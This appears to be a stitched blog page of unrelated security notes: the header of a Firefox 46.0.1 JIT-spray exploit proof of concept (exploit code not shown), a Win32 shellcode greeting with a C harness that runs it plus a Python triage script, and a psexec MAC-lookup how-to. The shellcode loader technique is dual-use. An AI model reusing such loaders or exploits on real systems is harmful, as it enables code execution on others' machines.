Demo Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution

<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successful exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018

-->

Reference:
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs

Happy New Year 2018

Shellcode with Chinese characters, win32/64 windows 7

2018


/*

               __
               /\/'-,
       ,--'''''   /"
 ____,'.  )       \___
'"""""------'"""`-----'

Happy New Year -  新年快樂

*/
#include <stdio.h>
#include <string.h>

/* Win32 x86 shellcode. It walks the PEB loader list until it finds the
   module whose UTF-16 base name has '3' at byte 12 (kernel32.dll), scans
   that module's export names for one starting "Fata" with "Exit" at
   offset 8 (FatalAppExitA), builds "Happy New Year " on the stack and
   calls FatalAppExitA(0, msg): a message box, then the process exits.
   The UTF-8 Chinese greeting at the end is trailing data; it is never
   executed because FatalAppExitA does not return. */
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08"
                   "\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c"
                   "\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01"
                   "\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"
                   "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01"
                   "\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x61\x72\x20\x01\x68\x77\x20\x59"
                   "\x65\x68\x79\x20\x4e\x65\x68\x48\x61\x70\x70\x89\xe1\xfe\x49\x0f"
                   "\x31\xc0\x51\x50\xff\xd7"
                   /* written as "\新\年..." originally; '\新' is not a valid
                      C escape sequence, the bare characters are what is meant
                      (save the source as UTF-8) */
                   "新年快樂狗年行大運好運旺旺來";

int main(void)
{
    /* "%ld" with an unsigned argument was a format mismatch. strlen is
       fine here because no byte of the shellcode is 0x00. */
    printf("shellcode length %u\n", (unsigned)strlen(shellcode));

    /* Call straight into the .data section. This only works where the
       process is not under DEP (Windows 7 client defaults to OptIn, so a
       binary linked without /NXCOMPAT qualifies); with DEP enforced the
       call faults instead of running the shellcode. */
    (*(int (*)(void))shellcode)();
    return 0;
}
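The shellcode above is opaque as a hex blob, but two byte patterns give it away quickly: strings assembled with back-to-back `push imm32` (opcode 0x68), and `cmp` instructions against 4-byte or 1-byte immediates that match module and export names. The following Python is an added triage example, not code from the original post; it scans the exact bytes shown above (embedded as `SHELLCODE`, without the trailing Chinese greeting) and reports both patterns. It is a linear byte scan, not a disassembler, so on other blobs treat its hits as leads to confirm in a disassembler.

```python
# Added example (not from the original post): static triage of a raw x86
# shellcode blob. Recovers strings built by runs of `push imm32` (0x68) and
# the immediates used in esi-relative `cmp` checks, which is how this kind
# of PEB-walking loader picks a module and an export by name fragments.
from typing import List, Tuple

# The shellcode bytes from the post above, without the trailing UTF-8 greeting.
SHELLCODE = bytes.fromhex(
    "31d2b230648b128b520c8b521c8b4208"
    "8b72208b12807e0c3375f289c703783c"
    "8b577801c28b7a2001c731ed8b34af01"
    "c645813e4661746175f2817e08457869"
    "7475e98b7a2401c7668b2c6f8b7a1c01"
    "c78b7caffc01c7686172200168772059"
    "656879204e65684861707089e1fe490f"
    "31c05150ffd7"
)


def pushed_strings(code: bytes, min_pushes: int = 2) -> List[str]:
    """Return strings assembled on the stack by runs of `push imm32`.

    The last push lands at the lowest address, so a run is joined in
    reverse. Runs shorter than min_pushes are ignored: a lone 0x68 byte
    is frequently just an operand of some other instruction.
    """
    found, i = [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            chunks = []
            while i + 5 <= len(code) and code[i] == 0x68:
                chunks.append(code[i + 1:i + 5])
                i += 5
            if len(chunks) >= min_pushes:
                found.append(b"".join(reversed(chunks)).decode("latin-1"))
        else:
            i += 1
    return found


def compare_immediates(code: bytes) -> List[Tuple[int, str]]:
    """Return (displacement, immediate-as-text) for esi-relative compares.

    Encodings handled:
      81 3E imm32     cmp dword [esi], imm32
      81 7E d8 imm32  cmp dword [esi+d8], imm32
      80 7E d8 imm8   cmp byte  [esi+d8], imm8
    """
    hits, i = [], 0
    while i + 1 < len(code):
        op, modrm = code[i], code[i + 1]
        if op == 0x81 and modrm == 0x3E and i + 6 <= len(code):
            hits.append((0, code[i + 2:i + 6].decode("latin-1")))
            i += 6
        elif op == 0x81 and modrm == 0x7E and i + 7 <= len(code):
            hits.append((code[i + 2], code[i + 3:i + 7].decode("latin-1")))
            i += 7
        elif op == 0x80 and modrm == 0x7E and i + 4 <= len(code):
            hits.append((code[i + 2], chr(code[i + 3])))
            i += 4
        else:
            i += 1
    return hits


def triage(code: bytes) -> dict:
    """Bundle both heuristics into one report for a first look at a blob."""
    return {"pushed_strings": pushed_strings(code),
            "compare_immediates": compare_immediates(code)}


if __name__ == "__main__":
    report = triage(SHELLCODE)
    for s in report["pushed_strings"]:
        print("stack string:", repr(s))
    for disp, text in report["compare_immediates"]:
        print(f"cmp at [esi+0x{disp:02x}] against {text!r}")
```

Reading the report for this blob: the stack string is `"Happy New Year \x01"`, and the `\x01` is what `dec byte [ecx+0xf]` (bytes `fe 49 0f`, right after `mov ecx, esp`) turns into the terminating NUL. The compares are `'3'` at byte 12 of a UTF-16 module name (KERNEL32), then `"Fata"` at offset 0 and `"Exit"` at offset 8 of an export name, which together match `FatalAppExitA`. Fragment compares like these are the reason string-based signatures on API names miss such loaders; the immediates, not the full names, are what is on disk.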

How to get remote computer’s mac address from windows tool – “psexec”

How to get remote computer’s mac address from psexec

PS D:\Admin\User> psexec \\win10-test -u admin -p Pa$$w0rd ipconfig /all

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com



Windows IP Configuration

   Host Name . . . . . . . . . . . . : win10-test
   Primary Dns Suffix  . . . . . . . : contoso.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : contoso.com

Wireless LAN adapter Wi-Fi:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) Dual Band Wireless-AC 7265
   Physical Address. . . . . . . . . : F9-A4-C5-FA-0D-AA
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : FA-A5-2C-A0-E0-AB
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : contoso.com
   Description . . . . . . . . . . . : Realtek PCIe GBE Family Controller
   Physical Address. . . . . . . . . : AD-A2-03-6C-CC-AC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe21::3007:f746:5e9b:f2bf%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.4.10(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Lease Obtained. . . . . . . . . . : February 14, 2018 11:16:09 AM
   Lease Expires . . . . . . . . . . : February 21, 2018 11:16:08 AM
   Default Gateway . . . . . . . . . : 10.10.4.254
   DHCP Server . . . . . . . . . . . : 10.10.4.17
   DHCPv6 IAID . . . . . . . . . . . : 61661907
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-0F-C5-56-AC-E2-D3-63-C3-30
   DNS Servers . . . . . . . . . . . : 10.10.4.99
                                       10.10.4.100
   Primary WINS Server . . . . . . . : 10.10.4.101
   Secondary WINS Server . . . . . . : 10.10.4.102
   NetBIOS over Tcpip. . . . . . . . : Enabled

ipconfig exited on it100092 with error code 0.
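Reading the Physical Address off the screen works for one host; for an inventory you want it as a field. The following Python is an added example, not part of the original post: it parses the text that `psexec \\host ipconfig /all` streams back (the sample is the exact output shown above, embedded as a constructed string) and returns one record per adapter with a normalised MAC, the IPv4 address and the media state, so disconnected virtual adapters can be told apart from the wired NIC. The output format is the only assumption; the parser handles the `name . . . : value` lines and the continuation lines ipconfig uses for multi-valued fields such as DNS servers.

```python
# Added example (not from the original post): turn `ipconfig /all` text
# into per-adapter records. Assumes the English ipconfig layout shown above.
import re
from typing import Dict, List

# Constructed sample: the output captured via psexec above, verbatim.
SAMPLE = """\
Windows IP Configuration

   Host Name . . . . . . . . . . . . : win10-test
   Primary Dns Suffix  . . . . . . . : contoso.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : contoso.com

Wireless LAN adapter Wi-Fi:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) Dual Band Wireless-AC 7265
   Physical Address. . . . . . . . . : F9-A4-C5-FA-0D-AA
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : FA-A5-2C-A0-E0-AB
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : contoso.com
   Description . . . . . . . . . . . : Realtek PCIe GBE Family Controller
   Physical Address. . . . . . . . . : AD-A2-03-6C-CC-AC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe21::3007:f746:5e9b:f2bf%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.4.10(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.4.254
   DHCP Server . . . . . . . . . . . : 10.10.4.17
   DNS Servers . . . . . . . . . . . : 10.10.4.99
                                       10.10.4.100
   NetBIOS over Tcpip. . . . . . . . : Enabled

ipconfig exited on it100092 with error code 0.
"""

# Key, dot-leader padding, colon, value. Keys never contain ':', values may
# (IPv6 addresses), so the lazy key group stops at the first colon.
PROP_RE = re.compile(r"^ {3}(\S[^:]*?)[ .]*: ?(.*)$")


def parse_ipconfig(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Map each section header to its properties; every value is a list,
    because a more deeply indented line with no key continues the previous
    property (second DNS server and the like)."""
    sections: Dict[str, Dict[str, List[str]]] = {}
    current, last_key = None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if not line.startswith(" "):           # section header or trailer
            current = sections.setdefault(line.rstrip(":"), {})
            last_key = None
            continue
        m = PROP_RE.match(line)
        if m and current is not None:
            last_key = m.group(1).strip()
            current.setdefault(last_key, []).append(m.group(2).strip())
        elif current is not None and last_key is not None:
            current[last_key].append(line.strip())  # continuation line
    return sections


def normalize_mac(mac: str) -> str:
    """Windows prints AA-BB-CC-DD-EE-FF; most inventories key on aa:bb:cc:dd:ee:ff."""
    return mac.strip().lower().replace("-", ":")


def adapters(text: str) -> List[Dict[str, object]]:
    """One flat record per adapter, i.e. per section that has a Physical Address."""
    records = []
    for name, props in parse_ipconfig(text).items():
        if "Physical Address" not in props:
            continue
        records.append({
            "adapter": name,
            "description": props.get("Description", [""])[0],
            "mac": normalize_mac(props["Physical Address"][0]),
            "ipv4": props.get("IPv4 Address", [""])[0].split("(")[0],  # drop "(Preferred)"
            "media_state": props.get("Media State", ["connected"])[0],
            "dns": props.get("DNS Servers", []),
        })
    return records


if __name__ == "__main__":
    for r in adapters(SAMPLE):
        print(f"{r['mac']}  {r['ipv4'] or '-':15}  {r['media_state']:18}  {r['adapter']}")
```

Two operational notes. Only the Ethernet record comes back as `connected` here; the two wireless entries report `Media disconnected` and one of them is a virtual Wi-Fi Direct adapter, so a script that blindly takes the first Physical Address would record the wrong MAC. And on the collection side, `-p Pa$$w0rd` on the psexec command line leaves the password in shell history and visible in process listings on the admin workstation; leaving `-p` off makes psexec prompt for it instead.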